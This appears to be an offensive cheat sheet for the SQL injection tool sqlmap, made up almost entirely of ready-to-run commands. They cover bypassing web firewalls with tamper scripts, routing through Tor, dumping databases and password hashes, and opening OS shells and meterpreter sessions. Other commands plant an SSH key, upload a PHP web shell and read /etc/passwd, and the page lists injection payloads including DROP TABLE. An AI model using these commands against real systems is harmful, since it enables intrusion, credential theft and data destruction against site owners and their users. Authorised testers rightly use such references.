💉 SQLmap

Options

🎯 Target & Request Options

bash

-u "https://exemple.com?id=*" # * is a dynamic parameter
-r request.txt                # request contains HTTP request

# Headers
--data "user=*&pass=1234"
--cookie="PHPSESSID=xxx"
--headers="x-forwarded-for:127.0.0.1*"
--method=POST

# HTTPS
--force-ssl # utils with -r option force HTTPS
--proxy # to ignored ssl certificate auto-sign

🛠️ Payload Customization

Advanced payload options

bash

sqlmap --eval="import hashlib;id2=hashlib.md5(id).hexdigest()"  # run custom Python code before request
sqlmap --sql-query="<sql_query>"                                # execute custom SQL query
sqlmap --prefix="0x" --suffix="-- -"                            # add prefix/suffix to payloads

Tampering & evasion

bash

--tamper=between,randomcase # use tamper scripts
--no-escape                 # don't use CHAR()
--no-cast                   # don't cast results to int/bool
--hex                       # encode payloads in hex

📋 Dump - Listing

Databases

bash

sqlmap --schema
sqlmap --dump # show data

sqlmap --dbs | --tables | --colums # list databases, tables, columns
sqlmap -D <db> -T <table> -C <column(s)> --dump # dump specific values
sqlmap --current-user | --current-db | --passwords

DBMS versions

bash

sqlmap --dbms=<database> <version> # version is not required
sqlmap --dbms=mysql
sqlmap --dbms="Microsoft SQL Server"

🧠 Detection & Techniques

bash

--technique=U    # use only UNION-based injection
--level=5        # test more parameters (headers, cookies, etc.)
--risk=3         # allow riskier payloads (e.g. heavy queries)

Injection Detection Methods

bash

--string="Welcome admin"  # detect success via response content
--regexp="(?i)Welcome"    # use regex to detect success in response
--code=200                # expect this HTTP status for success

Time-Based Settings

bash

--time-sec=5    # time delay for time-based payloads
--delay=1       # wait between each request
--timeout=10    # max time to wait for response

Injection Strategy Control

bash

--skip-waf             # skip WAF detection heuristics
--smart                # try logic-driven payload tuning
--predict-output       # infer results from multiple responses

🧅 Proxy and TOR

bash

sqlmap --proxy="http://127.0.0.1:8080"
sqlmap --proxy="socks5://user:pass@127.0.0.1:8080"
sqlmap --tor # tor connection
sqlmap --tor-type=SOCKS5
sqlmap --check-tor # check if Tor is used properly

🛰️ RevShells

bash

sqlmap --os-shell
sqlmap --sql-shell
sqlmap --os-pwn # meterpreter
sqlmap --file-write=/root/.ssh/id_rsa.pub --file-destination=/home/user/.ssh/ # ssh

🔧 Utils

⚙️ Core Options / Setup

bash

--flush-session   # flush session file
--batch           # automatic injection
--threads=5       # parallel requests
--retries=3       # retry failed requests

🔍 Discovery & Recon

bash

-p "*"                # test all parameters
-p id,user            # test specific parameters
-g "site.com index"   # use Google dork
--identify-waf        # try to detect WAF presence
--banner              # get DBMS banner
--is-dba              # check if user has DBA rights

🔐 Privilege & Session Info

bash

--privileges          # show current user's privileges
--roles               # list database roles
--users               # list DBMS users
--current-user        # show current DBMS user
--current-db          # show current database
--passwords           # dump user passwords if possible

🎛️ Injection Tuning & Strategy

Techniques

bash

# --technique (default "BEUSTQ")
sqlmap --technique=B

Technique	Description
B - Boolean-based blind	Exploits conditional responses (true/false). Example: `id=1 AND 1=1 --` (true) vs `id=1 AND 1=2 --` (false).
T - Time-based blind	Uses response delay to infer SQL injection success. Example: `id=1 AND SLEEP(5) --`.
E - Error-based	Extracts data through SQL error messages. Example: `id=1'` causing a database error revealing information.
U - Union-based	Uses `UNION SELECT` to fetch data directly in the response. Example: `id=1 UNION SELECT username, password FROM users --`.
S - Stacked queries	Executes multiple SQL queries in one request (requires `;`). Example: `id=1; DROP TABLE users --`.
Q - Inline queries	Executes subqueries inside the main query. Example: `id=(SELECT database())`.

Bypass - Technicals and options

Tamper (Scripts to Bypass)

Check this List of tamper scripts

bash

# List tamper scripts
sqlmap --list-tamper

sqlmap --tamper=script1,script2

Others options to Bypass

bash

sqlmap --randomize=user,password # random value in fields
sqlmap --random-agent # random user-agent
sqlmap --test-filter="boolean"

Difficulty

bash

# Difficulty
sqlmap --level="<1-5>"
sqlmap --risk="<1-3>" # (Warning in production)

Level	Description	Payload Examples
1	Basic tests, faster, fewer payloads.	`' OR 1=1 --`, `' AND 1=1 --`
2-3	Slightly more complex, tests a wider range of payloads and techniques.	`' OR 1=1 LIMIT 1 --`, `1' AND 1=1 --`, `' OR 1=1 GROUP BY NULL --`
4-5	Advanced tests, more payloads, complex techniques, slower.	`1' UNION SELECT NULL, username, password FROM users --`, `1' AND SLEEP(5) --`

⚠️ Note: --level=5 sends advanced payloads to bypass firewalls with heavy encoding, but may miss basic injections like ' OR 1=1 --.

Payload

bash

# strong request
sqlmap -r request -p id --level=5 --risk=3 --dbms=mysql --os-shell --random-agent --threads=10

Crawling & auto-exploit

(Warning in production). It scrapes websites and auto-exploits vulnerabilities, submits forms, and may risk deleting sensitive data.

bash

sqlmap -u "http://example.com/?id=*" --crawl=1 --random-agent --batch --forms --threads=10 --level=5 --risk=3

bash

# WAF bypass
sqlmap -r request --level=5 --dbms=mysql --os-shell --tamper=space2comment,charencode,between,randomcase --random-agent --proxy=https://example.com --threads=10

File

bash

# upload web_shell
sudo sqlmap -r request --file-write=shell.php --file-dest=/var/www/shell.php

# read file
sqlmap -u "http://example.com/?id=*" --file-read=/etc/passwd

Dump

bash

# dump specific column
sqlmap -r request -D db_name -T users -C username,password --dump

# dump current db
sqlmap -r request --dbms=mysql --dump

# dump all db
sqlmap -r request --dbms=mysql --dump-all

# connect and dump
sqlmap -d "mysql://user:pass@ip/database" --tor --dump

Hashcat

Nmap

53 DNS

DNS Attack

SQL Injection

XSS Injection

Json Web Token

Kerberos

Post Exploit

💉 SQLmap ​

Options ​

🎯 Target & Request Options ​

🛠️ Payload Customization ​

Advanced payload options ​

Tampering & evasion ​

📋 Dump - Listing ​

Databases ​

DBMS versions ​

🧠 Detection & Techniques ​

Injection Detection Methods ​

Time-Based Settings ​

Injection Strategy Control ​

🧅 Proxy and TOR ​

🛰️ RevShells ​

🔧 Utils ​

⚙️ Core Options / Setup ​

🔍 Discovery & Recon ​

🔐 Privilege & Session Info ​

🎛️ Injection Tuning & Strategy ​

Techniques ​

Bypass - Technicals and options ​

Tamper (Scripts to Bypass) ​

Others options to Bypass ​

Difficulty ​

Payload ​

Crawling & auto-exploit ​

File ​

Dump ​

Resources ​

💉 SQLmap

Options

🎯 Target & Request Options

🛠️ Payload Customization

Advanced payload options

Tampering & evasion

📋 Dump - Listing

Databases

DBMS versions

🧠 Detection & Techniques

Injection Detection Methods

Time-Based Settings

Injection Strategy Control

🧅 Proxy and TOR

🛰️ RevShells

🔧 Utils

⚙️ Core Options / Setup

🔍 Discovery & Recon

🔐 Privilege & Session Info

🎛️ Injection Tuning & Strategy

Techniques

Bypass - Technicals and options

Tamper (Scripts to Bypass)

Others options to Bypass

Difficulty

Payload

Crawling & auto-exploit

File

Dump

Resources